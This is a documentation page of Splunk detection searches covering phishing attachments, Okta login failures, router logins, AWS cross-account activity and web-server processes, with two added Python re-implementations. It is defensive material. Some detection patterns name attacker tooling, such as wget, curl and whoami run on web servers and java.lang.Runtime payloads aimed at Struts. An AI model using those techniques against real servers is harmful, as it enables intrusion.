Splunk® Security Content

Detections

This documentation does not apply to the most recent version of ESSOC.

Splunk Security Content Detections


All the detections shipped with the different Splunk products, broken down by kind.

Application

Detect new login attempts to routers

The search queries the Authentication data model for destinations categorized as routers in the ES Assets and Identity Framework and reports each user/router pair whose earliest observed authentication falls within the last 30 days, i.e. logins to routing infrastructure that have not been seen before in that period.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Authentication
  • ATT&CK:
  • Last Updated: 2017-09-12

Search

| tstats `security_content_summariesonly` count earliest(_time) as earliest latest(_time) as latest from datamodel=Authentication where Authentication.dest_category=router by Authentication.dest Authentication.user | eval isOutlier=if(earliest >= relative_time(now(), "-30d@d"), 1, 0) | where isOutlier=1 | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | `drop_dm_object_name("Authentication")` | `detect_new_login_attempts_to_routers_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must ensure the network router devices are categorized as "router" in the Assets and Identity table, so that Authentication.dest_category is populated. You must also populate the Authentication data model with logs related to users authenticating to routing infrastructure.

Required field

Kill Chain Phase

  • Actions on Objectives


Known False Positives

Legitimate router logins by a user who has not authenticated to that device in the last 30 days will appear as new connections.

Reference

Test Dataset

version: 1


Email attachments with lots of spaces

Attackers often use runs of spaces to push an attachment's real file extension out of view and obfuscate it. This search looks for messages with email attachments whose file names contain an unusually high proportion of spaces (10% or more of the characters, by default).

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Email
  • ATT&CK:
  • Last Updated: 2017-09-19

Search

| tstats `security_content_summariesonly` count values(All_Email.recipient) as recipient_address min(_time) as firstTime max(_time) as lastTime from datamodel=Email where All_Email.file_name="*" by All_Email.src_user, All_Email.file_name All_Email.message_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name("All_Email")` | eval space_ratio = (mvcount(split(file_name," "))-1)/len(file_name) | search space_ratio >= 0.1 | rex field=recipient_address "(?<recipient_user>.*)@" | `email_attachments_with_lots_of_spaces_filter`

Associated Analytic Story


How To Implement

You need to ingest data from emails. Specifically, the sender's address and the file names of any attachments must be mapped to the Email data model. The threshold ratio is set to 10%, but this value can be configured to suit each environment.

**Splunk Phantom Playbook Integration**

If Splunk Phantom is also configured in your environment, a playbook called "Suspicious Email Attachment Investigate and Delete" can be configured to run when any results are found by this detection search. To use this integration, install the Phantom App for Splunk `https://splunkbase.splunk.com/app/3411/` and add the correct hostname to the "Phantom Instance" field in the Adaptive Response Actions when configuring this detection search. The notable event will be sent to Phantom and the playbook will gather further information about the file attachment and its network behaviors. If Phantom finds malicious behavior and an analyst approves of the results, the email will be deleted from the user's inbox.

Required field

Kill Chain Phase

  • Delivery


Known False Positives

None at this time

Reference

Test Dataset

version: 2


Email files written outside of the outlook directory

The search looks at the Endpoint.Filesystem data model and detects Outlook data files (.pst and .ost) created outside the normal Outlook directories.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1114.001
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count values(Filesystem.file_path) as file_path min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where (Filesystem.file_name=*.pst OR Filesystem.file_name=*.ost) Filesystem.file_path != "C:\\Users\\*\\My Documents\\Outlook Files\\*" Filesystem.file_path!="C:\\Users\\*\\AppData\\Local\\Microsoft\\Outlook*" by Filesystem.action Filesystem.process_id Filesystem.file_name Filesystem.dest | `drop_dm_object_name("Filesystem")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `email_files_written_outside_of_the_outlook_directory_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records the file-system activity from your hosts to populate the Endpoint.Filesystem data model node. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or by other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report file-system reads and writes.

Required field

ATT&CK

ID Technique Tactic
T1114.001 Local Email Collection Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Administrators and users sometimes prefer backing up their email data by moving the email files into a different folder. These attempts will be detected by the search.

Reference

Test Dataset

version: 3


Email servers sending high volume traffic to hosts

This search looks for an increase of data transfers from your email server to your clients. This could be indicative of a malicious actor collecting data using your email server.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Network_Traffic
  • ATT&CK: T1114.002
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` sum(All_Traffic.bytes_out) as bytes_out from datamodel=Network_Traffic where All_Traffic.src_category=email_server by All_Traffic.dest_ip _time span=1d | `drop_dm_object_name("All_Traffic")` | eventstats avg(bytes_out) as avg_bytes_out stdev(bytes_out) as stdev_bytes_out | eventstats count as num_data_samples avg(eval(if(_time < relative_time(now(), "@d"), bytes_out, null))) as per_source_avg_bytes_out stdev(eval(if(_time < relative_time(now(), "@d"), bytes_out, null))) as per_source_stdev_bytes_out by dest_ip | eval minimum_data_samples = 4, deviation_threshold = 3 | where num_data_samples >= minimum_data_samples AND bytes_out > (avg_bytes_out + (deviation_threshold * stdev_bytes_out)) AND bytes_out > (per_source_avg_bytes_out + (deviation_threshold * per_source_stdev_bytes_out)) AND _time >= relative_time(now(), "@d") | eval num_standard_deviations_away_from_server_average = round(abs(bytes_out - avg_bytes_out) / stdev_bytes_out, 2), num_standard_deviations_away_from_client_average = round(abs(bytes_out - per_source_avg_bytes_out) / per_source_stdev_bytes_out, 2) | table dest_ip, _time, bytes_out, avg_bytes_out, per_source_avg_bytes_out, num_standard_deviations_away_from_server_average, num_standard_deviations_away_from_client_average | `email_servers_sending_high_volume_traffic_to_hosts_filter`

Associated Analytic Story


How To Implement

This search requires you to be ingesting your network traffic and populating the Network_Traffic data model. Your email servers must be categorized as "email_server" in the Assets and Identity Framework for the search to work, as well. You may need to adjust the deviation_threshold and minimum_data_samples values based on the network traffic in your environment. The "deviation_threshold" field is a multiplying factor applied to the standard deviation to control how much variation you're willing to tolerate. The "minimum_data_samples" field is the minimum number of daily samples (days of traffic) a client must have before the statistic is considered valid. Note that the search applies two baselines: the first eventstats averages over every client and every day, today included, while the second averages each client's own history with today excluded, and a client must exceed both before it is reported.
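The two-baseline threshold described above, re-implemented in Python as an added example (this is not Splunk's code; the daily byte counts, the two client addresses and the value of "today" are constructed for the demonstration). It reproduces the server-wide baseline, the per-client history that excludes the current day, the minimum_data_samples gate and the deviation_threshold multiplier, using the sample standard deviation as Splunk's stdev does, so the effect of each knob can be checked before tuning the search:

```python
"""Added example, not part of Splunk Security Content: the thresholding logic of
"Email servers sending high volume traffic to hosts", re-implemented in Python
over constructed daily byte counts so both baselines can be inspected."""
from collections import defaultdict
from datetime import date, timedelta
from statistics import mean, stdev

# Assumed "current day", standing in for relative_time(now(), "@d") in the search.
TODAY = date(2020, 7, 21)

# Constructed rows of (dest_ip, day, bytes_out), i.e. what
# "tstats sum(All_Traffic.bytes_out) ... by All_Traffic.dest_ip _time span=1d"
# would return for two clients: eight quiet days each, then a burst to 10.20.0.5.
SAMPLE_ROWS = []
for d in range(8, 0, -1):
    day = TODAY - timedelta(days=d)
    SAMPLE_ROWS.append(("10.20.0.5", day, 50_000 + 1_000 * (d % 3)))
    SAMPLE_ROWS.append(("10.20.0.9", day, 80_000 + 2_000 * (d % 2)))
SAMPLE_ROWS.append(("10.20.0.5", TODAY, 900_000))  # roughly 18x its usual volume
SAMPLE_ROWS.append(("10.20.0.9", TODAY, 82_000))   # within its normal range


def _z(value, avg, sd):
    """num_standard_deviations_away_from_*: None where Splunk would divide by zero."""
    return round(abs(value - avg) / sd, 2) if sd > 0 else None


def high_volume_clients(rows, today, deviation_threshold=3, minimum_data_samples=4):
    """Return today's rows whose bytes_out exceeds BOTH the server-wide baseline
    (first eventstats: every row, today included) and the client's own history
    (second eventstats: that client's rows before today) by more than
    deviation_threshold sample standard deviations."""
    all_bytes = [b for _, _, b in rows]
    if len(all_bytes) < 2:
        return []
    avg_all, sd_all = mean(all_bytes), stdev(all_bytes)

    history = defaultdict(list)   # per-client bytes_out for days before today
    samples = defaultdict(int)    # num_data_samples: all rows per client, today included
    for ip, day, b in rows:
        samples[ip] += 1
        if day < today:
            history[ip].append(b)

    hits = []
    for ip, day, b in rows:
        if day != today or samples[ip] < minimum_data_samples:
            continue
        hist = history[ip]
        if len(hist) < 2:          # stdev needs two samples; Splunk would yield null here
            continue
        avg_src, sd_src = mean(hist), stdev(hist)
        if (b > avg_all + deviation_threshold * sd_all
                and b > avg_src + deviation_threshold * sd_src):
            hits.append({
                "dest_ip": ip,
                "bytes_out": b,
                "avg_bytes_out": round(avg_all, 2),
                "per_source_avg_bytes_out": round(avg_src, 2),
                "z_server": _z(b, avg_all, sd_all),
                "z_client": _z(b, avg_src, sd_src),
            })
    return hits


if __name__ == "__main__":
    for hit in high_volume_clients(SAMPLE_ROWS, TODAY):
        print(hit)
```

With the constructed data only 10.20.0.5 is reported: its 900,000 bytes sit about four standard deviations above the server-wide mean and far above its own history, while 10.20.0.9's 82,000 is inside its normal range. Raising deviation_threshold to 5 or minimum_data_samples above the nine rows per client suppresses the hit, which is the tuning trade-off the How To Implement text describes.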

Required field

ATT&CK

ID Technique Tactic
T1114.002 Remote Email Collection Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

The false-positive rate will vary based on how you set the deviation_threshold and minimum_data_samples values. Our recommendation is to adjust these values based on your network traffic to and from your email servers.

Reference

Test Dataset

version: 2


Monitor email for brand abuse

This search looks for emails claiming to be sent from a domain similar to one that you want to have monitored for abuse.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Email
  • ATT&CK:
  • Last Updated: 2018-01-05

Search

| tstats `security_content_summariesonly` values(All_Email.recipient) as recipients, min(_time) as firstTime, max(_time) as lastTime from datamodel=Email by All_Email.src_user, All_Email.message_id | `drop_dm_object_name("All_Email")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | eval temp=split(src_user, "@") | eval email_domain=mvindex(temp, 1) | lookup update=true brandMonitoring_lookup domain as email_domain OUTPUT domain_abuse | search domain_abuse=true | table message_id, src_user, email_domain, recipients, firstTime, lastTime | `monitor_email_for_brand_abuse_filter`

Associated Analytic Story


How To Implement

You need to ingest email header data. Specifically, the sender's address (src_user) must be populated. You also need to have run the search "ESCU - DNSTwist Domain Names", which populates the brandMonitoring_lookup with the permutations of your domains that will be checked for.

Required field

Kill Chain Phase

  • Delivery


Known False Positives

None at this time

Reference

Test Dataset

version: 2


Multiple okta users with invalid credentials from the same ip

This search detects Okta login failures due to bad credentials for more than five distinct users originating from the same IP address.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.001
  • Last Updated: 2020-07-21

Search

`okta` outcome.reason=INVALID_CREDENTIALS | rename client.geographicalContext.country as country, client.geographicalContext.state as state, client.geographicalContext.city as city | stats min(_time) as firstTime max(_time) as lastTime dc(user) as distinct_users values(user) as users by src_ip, displayMessage, outcome.reason, country, state, city | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search distinct_users > 5 | `multiple_okta_users_with_invalid_credentials_from_the_same_ip_filter`

Associated Analytic Story


How To Implement

This search is specific to Okta and requires that Okta logs are being ingested in your Splunk deployment.

Required field

ATT&CK

ID Technique Tactic
T1078.001 Default Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

A single public IP address servicing multiple legitimate users may trigger this search. In addition, the threshold of 5 distinct users may be too low for your needs. You may modify the included filter macro `multiple_okta_users_with_invalid_credentials_from_the_same_ip_filter` to raise the threshold or exempt specific IP addresses from triggering this search.

Reference

Test Dataset

version: 2


No windows updates in a time frame

This search looks for Windows endpoints that have not generated an event indicating a successful Windows update in the last 60 days. Windows updates are typically released monthly and applied shortly thereafter. An endpoint that has not successfully applied an update in this time frame indicates the endpoint is not regularly being patched for some reason.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Updates
  • ATT&CK:
  • Last Updated: 2017-09-15

Search

| tstats `security_content_summariesonly` max(_time) as lastTime from datamodel=Updates where Updates.status=Installed Updates.vendor_product="Microsoft Windows" by Updates.dest Updates.status Updates.vendor_product | rename Updates.dest as Host | rename Updates.status as "Update Status" | rename Updates.vendor_product as Product | eval isOutlier=if(lastTime <= relative_time(now(), "-60d@d"), 1, 0) | `security_content_ctime(lastTime)` | search isOutlier=1 | rename lastTime as "Last Update Time" | table Host, "Update Status", Product, "Last Update Time" | `no_windows_updates_in_a_time_frame_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, the Updates data model must be populated. This can be accomplished by ingesting Windows events or the Windows Update log via a universal forwarder on the Windows endpoints you wish to monitor. The Windows add-on should also be installed and configured to properly parse Windows events in Splunk. There may be other data sources which can populate this data model, including vulnerability management systems.

Required field

Kill Chain Phase

Known False Positives

None identified

Reference

Test Dataset

version: 1


Okta account lockout events

Detect Okta user lockout events

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.001
  • Last Updated: 2020-07-21

Search

`okta` displayMessage="Max sign in attempts exceeded" | rename client.geographicalContext.country as country, client.geographicalContext.state as state, client.geographicalContext.city as city | table _time, user, country, state, city, src_ip | `okta_account_lockout_events_filter`

Associated Analytic Story


How To Implement

This search is specific to Okta and requires that Okta logs are being ingested in your Splunk deployment.

Required field

ATT&CK

ID Technique Tactic
T1078.001 Default Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

None. Account lockouts should be followed up on to determine if the actual user was the one who caused the lockout, or if it was an unauthorized actor.

Reference

Test Dataset

version: 2


Okta failed sso attempts

Detect failed Okta SSO events

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.001
  • Last Updated: 2020-07-21

Search

`okta` displayMessage="User attempted unauthorized access to app" | stats min(_time) as firstTime max(_time) as lastTime values(app) as Apps count by user, result ,displayMessage, src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_failed_sso_attempts_filter`

Associated Analytic Story


How To Implement

This search is specific to Okta and requires that Okta logs are being ingested in your Splunk deployment.

Required field

ATT&CK

ID Technique Tactic
T1078.001 Default Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

There may be a faulty configuration preventing legitimate users from accessing apps they should have access to.

Reference

Test Dataset

version: 2


Okta user logins from multiple cities

This search detects logins from the same user from different cities in a 24 hour period.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.001
  • Last Updated: 2020-07-21

Search

`okta` displayMessage="User login to Okta" client.geographicalContext.city!=null | stats min(_time) as firstTime max(_time) as lastTime dc(client.geographicalContext.city) as locations values(client.geographicalContext.city) as cities values(client.geographicalContext.state) as states by user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_user_logins_from_multiple_cities_filter` | search locations > 1

Associated Analytic Story


How To Implement

This search is specific to Okta and requires that Okta logs are being ingested in your Splunk deployment.

Required field

ATT&CK

ID Technique Tactic
T1078.001 Default Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

Users in your environment may legitimately be travelling and logging in from different locations. This search is useful for users who should *not* be travelling for some reason, such as during the COVID-19 pandemic. The search also relies on the geographical information being populated in the Okta logs. It is also possible that a connection from another region is attributed to a login from a remote VPN endpoint.

Reference

Test Dataset

version: 2


Phishing email detection by machine learning method - ssa

Malicious mail can carry phishing content that induces the reader to open an attachment, click a link or trigger a third-party service. This detection uses a Natural Language Processing (NLP) approach to analyze an email message's content (sender, subject and body) and judge whether it is a phishing email. It adopts a deep learning (neural network) model that combines character-level embeddings with LSTM layers to perform the classification. The model is pre-trained and published in ONNX format. The current sample model is trained on the dataset published at https://github.com/splunk/attack_data/tree/master/datasets/T1566_Phishing_Email/splunk_train.json; users are expected to re-train the model on that data combined with their own training data, using the provided model file (SMLE notebook), for better accuracy. The DSP pipeline then processes the email message and passes it as an event to the Apply ML Models function, which returns the probability that it is a phishing email. The current implementation assumes the email is fed to DSP in JSON format containing at least the email's sender, subject and message body, including any reply content.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1566
  • Last Updated: 2020-08-25

Search

| from read_ssa_enriched_events() | eval eventLine=concat(ucast(map_get(input_event, "From"), "string", " "), " ", ucast(map_get(input_event, "Subject"), "string", " "), " ", ucast(map_get(input_event, "Content"), "string", " "), " "), _time=map_get(input_event, "_time") | where eventLine IS NOT NULL | eval mapC={" ": 32, "!": 33, "\"": 34, "#": 35, "$": 36, "%": 37, "&": 38, "'": 39, "(": 40, ")": 41, "*": 42, "+": 43, ",": 44, "-": 45, ".": 46, "/": 47, "0": 48, "1": 49, "2": 50, "3": 51, "4": 52, "5": 53, "6": 54, "7": 55, "8": 56, "9": 57, ":": 58, ";": 59, "<": 60, "=": 61, ">": 62, "?": 63, "@": 64, "A": 65, "B": 66, "C": 67, "D": 68, "E": 69, "F": 70, "G": 71, "H": 72, "I": 73, "J": 74, "K": 75, "L": 76, "M": 77, "N": 78, "O": 79, "P": 80, "Q": 81, "R": 82, "S": 83, "T": 84, "U": 85, "V": 86, "W": 87, "X": 88, "Y": 89, "Z": 90, "[": 91, "\\": 92, "]": 93, "^": 94, "_": 95, "`": 96, "a": 97, "b": 98, "c": 99, "d": 100, "e": 101, "f": 102, "g": 103, "h": 104, "i": 105, "j": 106, "k": 107, "l": 108, "m": 109, "n": 110, "o": 111, "p": 112, "q": 113, "r": 114, "s": 115, "t": 116, "u": 117, "v": 118, "w": 119, "x": 120, "y": 121, "z": 122, "{": 123, "|": 124, "}": 125, "~": 126}, ml_in = for_each(iterator(mvrange(1,129), "i"), cast(map_get(mapC, substr(eventLine, i, 1)), "float") ) | apply_model connection_id="YOUR_S3_ONNX_CONNECTOR_ID" name="phishing_email_v8" path="s3://smle-experiments/models/phishing_email" | eval probability = mvindex(ml_out, 0) | where probability > 0.5 | eval start_time=_time, end_time=_time, entities="TBD", body="TBD" | select probability, body, entities, start_time, end_time | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

Events fed to DSP must contain at least the email's sender, subject and message body. Only the first 128 characters of the concatenated sender, subject and body are encoded as model input, and characters outside the printable ASCII range are not in the character map, so ensure the model you train uses the same preprocessing.

Required field

ATT&CK

ID Technique Tactic
T1566 Phishing Initial Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Because anomalous samples are under-represented in the training data, the model is unlikely to report false positives; it is instead more prone to false negatives. The current best recall score is ~85%.

Reference

Test Dataset

version: 1


Spectre and meltdown vulnerable systems

The search is used to detect systems that are still vulnerable to the Spectre and Meltdown vulnerabilities.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Vulnerabilities
  • ATT&CK:
  • Last Updated: 2017-01-07

Search

| tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Vulnerabilities where Vulnerabilities.cve ="CVE-2017-5753" OR Vulnerabilities.cve ="CVE-2017-5715" OR Vulnerabilities.cve ="CVE-2017-5754" by Vulnerabilities.dest | `drop_dm_object_name(Vulnerabilities)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `spectre_and_meltdown_vulnerable_systems_filter`

Associated Analytic Story


How To Implement

The search requires that you are ingesting your vulnerability-scanner data and that it reports the CVE of the vulnerability identified.

Required field

Kill Chain Phase

Known False Positives

It is possible that your vulnerability scanner is not detecting that the patches have been applied.

Reference

Test Dataset

version: 1


Suspicious email - uba anomaly

This detection looks for emails that are suspicious because of their sender, domain rareness, or behavior differences. This is an anomaly generated by Splunk User Behavior Analytics (UBA).

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: UEBA
  • ATT&CK: T1566
  • Last Updated: 2020-07-22

Search

|tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(All_UEBA_Events.category) as category from datamodel=UEBA where nodename=All_UEBA_Events.UEBA_Anomalies All_UEBA_Events.UEBA_Anomalies.uba_model = "SuspiciousEmailDetectionModel" by All_UEBA_Events.description All_UEBA_Events.severity All_UEBA_Events.user All_UEBA_Events.uba_event_type All_UEBA_Events.link All_UEBA_Events.signature All_UEBA_Events.url All_UEBA_Events.UEBA_Anomalies.uba_model | `drop_dm_object_name(All_UEBA_Events)` | `drop_dm_object_name(UEBA_Anomalies)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_email___uba_anomaly_filter`

Associated Analytic Story


How To Implement

You must be ingesting data from email logs and have Splunk integrated with UBA. This anomaly is raised by a UBA detection model called "SuspiciousEmailDetectionModel." Ensure that this model is enabled on your UBA instance.

Required field

ATT&CK

ID Technique Tactic
T1566 Phishing Initial Access


Kill Chain Phase

  • Delivery


Known False Positives

This detection model will alert on any sender domain that is seen for the first time, which could be a false positive. The next step is to investigate and add the sender domain to an allow list if you determine that it is a legitimate sender.

Reference

Test Dataset

version: 3


Suspicious email attachment extensions

This search looks for emails that have attachments with suspicious file extensions.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Email
  • ATT&CK: T1566.001
  • Last Updated: 2020-07-22

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Email where All_Email.file_name="*" by All_Email.src_user, All_Email.file_name All_Email.message_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name("All_Email")` | `suspicious_email_attachments` | `suspicious_email_attachment_extensions_filter`

Associated Analytic Story


How To Implement

You need to ingest data from emails. Specifically, the sender's address and the file names of any attachments must be mapped to the Email data model.

**Splunk Phantom Playbook Integration**

If Splunk Phantom is also configured in your environment, a Playbook called "Suspicious Email Attachment Investigate and Delete" can be configured to run when any results are found by this detection search. To use this integration, install the Phantom App for Splunk `https://splunkbase.splunk.com/app/3411/`, and add the correct hostname to the "Phantom Instance" field in the Adaptive Response Actions when configuring this detection search. The notable event will be sent to Phantom and the playbook will gather further information about the file attachment and its network behaviors. If Phantom finds malicious behavior and an analyst approves of the results, the email will be deleted from the user's inbox.

Required field

ATT&CK

ID Technique Tactic
T1566.001 Spearphishing Attachment Initial Access


Kill Chain Phase

  • Delivery


Known False Positives

None identified

Reference

Test Dataset

version: 3


Suspicious java classes

This search looks for suspicious Java classes that are often used to exploit remote command execution in common Java frameworks, such as Apache Struts.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2018-12-06

Search

`stream_http` http_method=POST http_content_length>1 | regex form_data="(?i)java\.lang\.(?:runtime|processbuilder)" | rename src_ip as src | stats count earliest(_time) as firstTime, latest(_time) as lastTime, values(url) as uri, values(status) as status, values(http_user_agent) as http_user_agent by src, dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_java_classes_filter`

Associated Analytic Story


How To Implement

In order to properly run this search, Splunk needs to ingest data from your web-traffic appliances that serve or sit in the path of your Struts application servers. This can be accomplished by indexing data from a web proxy, or by using network traffic-analysis tools, such as Splunk Stream or Bro (Zeek). The search inspects the POST form data for references to the java.lang.Runtime and java.lang.ProcessBuilder classes, so the form_data field must be captured.

Required field

Kill Chain Phase

  • Exploitation


Known False Positives

There are no known false positives.

Reference

Test Dataset

version: 1


Web servers executing suspicious processes

This search looks for suspicious processes on all systems labeled as web servers.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1082
  • Last Updated: 2019-04-01

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.dest_category="web_server" AND (Processes.process="*whoami*" OR Processes.process="*ping*" OR Processes.process="*iptables*" OR Processes.process="*wget*" OR Processes.process="*service*" OR Processes.process="*curl*") by Processes.process Processes.process_name, Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `web_servers_executing_suspicious_processes_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model. In addition, web servers will need to be identified in the Assets and Identity Framework of Enterprise Security.

Required field

ATT&CK

ID Technique Tactic
T1082 System Information Discovery Discovery


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Some of these processes may be used legitimately on web servers during maintenance or other administrative tasks.

Reference

Test Dataset

version: 1



Cloud

Aws cross account activity from previously unseen account

This search looks for AssumeRole events where an IAM role in a different account is requested for the first time. This search is deprecated and has been translated to use the latest Authentication data model.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Authentication
  • ATT&CK:
  • Last Updated: 2020-05-28

Search

| tstats min(_time) as firstTime max(_time) as lastTime from datamodel=Authentication where Authentication.signature=AssumeRole by Authentication.vendor_account Authentication.user Authentication.src Authentication.user_role | `drop_dm_object_name(Authentication)` | rex field=user_role "arn:aws:sts:*:(?<dest_account>.*):" | where vendor_account != dest_account | rename vendor_account as requestingAccountId dest_account as requestedAccountId | lookup previously_seen_aws_cross_account_activity requestingAccountId, requestedAccountId, OUTPUTNEW firstTime | eval status = if(firstTime > relative_time(now(), "-24h@h"),"New Cross Account Activity","Previously Seen") | where status = "New Cross Account Activity" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_cross_account_activity_from_previously_unseen_account_filter`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen AWS Cross Account Activity - Initial` to build the initial table of requesting and requested account IDs and the time each pair was first seen. You must also enable the second baseline search `Previously Seen AWS Cross Account Activity - Update` to keep this table up to date and to age out old data. Because `lookup ... OUTPUTNEW firstTime` does not overwrite a firstTime the tstats row already carries, the 24-hour comparison runs against the earliest event in the searched time range, so run this search over a window longer than 24 hours. You can also provide additional filtering for this search by customizing the `aws_cross_account_activity_from_previously_unseen_account_filter` macro.
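The account-pair extraction and first-seen comparison described above, as an added Python example (not Splunk's code). The AssumeRole rows, the baseline table and the value of "now" are constructed; the ARN pattern is a stricter form of the search's rex that assumes the requested account is the 12-digit fourth field of an STS assumed-role ARN. A pair is "new" when its first-seen time, taken from the baseline where the pair is already recorded and otherwise from the earliest row in the current batch, falls inside the 24-hour window:

```python
"""Added example, not part of Splunk Security Content: the account-pair extraction
and first-seen comparison of "Aws cross account activity from previously unseen
account", written in Python over constructed AssumeRole rows."""
import re
from datetime import datetime, timedelta

# Stricter form of the search's rex on user_role (assumption: the requested
# account is the 12-digit fourth ARN field of an STS assumed-role ARN).
ROLE_ARN = re.compile(r"^arn:aws:sts::(?P<dest_account>\d{12}):")

# Assumed "now"; relative_time(now(), "-24h@h") in the search is NOW - 24h.
NOW = datetime(2020, 5, 28, 12, 0)

# Constructed rows as tstats would return them:
# (vendor_account, user, src, user_role, firstTime)
SAMPLE_ROWS = [
    ("111122223333", "alice", "203.0.113.10",
     "arn:aws:sts::444455556666:assumed-role/ReadOnlyAudit/alice", NOW - timedelta(hours=2)),
    ("111122223333", "deploy-bot", "203.0.113.20",
     "arn:aws:sts::777788889999:assumed-role/Deployer/ci", NOW - timedelta(hours=1)),
    ("111122223333", "bob", "203.0.113.30",
     "arn:aws:sts::111122223333:assumed-role/SameAccountRole/bob", NOW - timedelta(hours=3)),
]

# Constructed baseline (previously_seen_aws_cross_account_activity):
# (requestingAccountId, requestedAccountId) -> firstTime
SAMPLE_BASELINE = {
    ("111122223333", "777788889999"): NOW - timedelta(days=40),
}


def account_pair(vendor_account, user_role):
    """Return (requestingAccountId, requestedAccountId), or None for same-account
    activity or an ARN that does not parse (the search's where vendor_account != dest_account)."""
    m = ROLE_ARN.match(user_role)
    if not m or m["dest_account"] == vendor_account:
        return None
    return vendor_account, m["dest_account"]


def new_cross_account_activity(rows, baseline, now, window=timedelta(hours=24)):
    """Return the cross-account pairs whose first-seen time falls inside `window`.
    The first-seen time is the baseline's record where the pair is known,
    otherwise the earliest firstTime among this batch of rows."""
    earliest = {}
    for vendor_account, _user, _src, user_role, first_time in rows:
        pair = account_pair(vendor_account, user_role)
        if pair is None:
            continue
        earliest[pair] = min(earliest.get(pair, first_time), first_time)
    cutoff = now - window
    return sorted(pair for pair, batch_first in earliest.items()
                  if baseline.get(pair, batch_first) > cutoff)


if __name__ == "__main__":
    for requesting, requested in new_cross_account_activity(SAMPLE_ROWS, SAMPLE_BASELINE, NOW):
        print(f"New Cross Account Activity: {requesting} -> {requested}")
```

With the constructed data, alice's assumption of a role in 444455556666 is reported as new, deploy-bot's role in 777788889999 is suppressed because the baseline recorded that pair 40 days ago, and bob's same-account role is dropped before the comparison. Running the same rows against an empty baseline reports both cross-account pairs, which is what happens on the first run before the Initial baseline search has been executed.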

Required field

Kill Chain Phase

  • Actions on Objectives


Known False Positives

Using multiple AWS accounts and roles is perfectly valid behavior. It's suspicious when an account requests privileges of an account it hasn't before. You should validate with the account owner that this is a legitimate request.

Reference

Test Dataset


version: 1


Aws detect users creating keys with encrypt policy without mfa

This search detects KMS key policies in which the kms:Encrypt action is granted to everyone (the `*` principal), including parties outside your organization. This is an indicator that your account has been compromised and that the attacker is using the encryption key to encrypt another organization's data.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1486
  • Last Updated: 2021-01-11

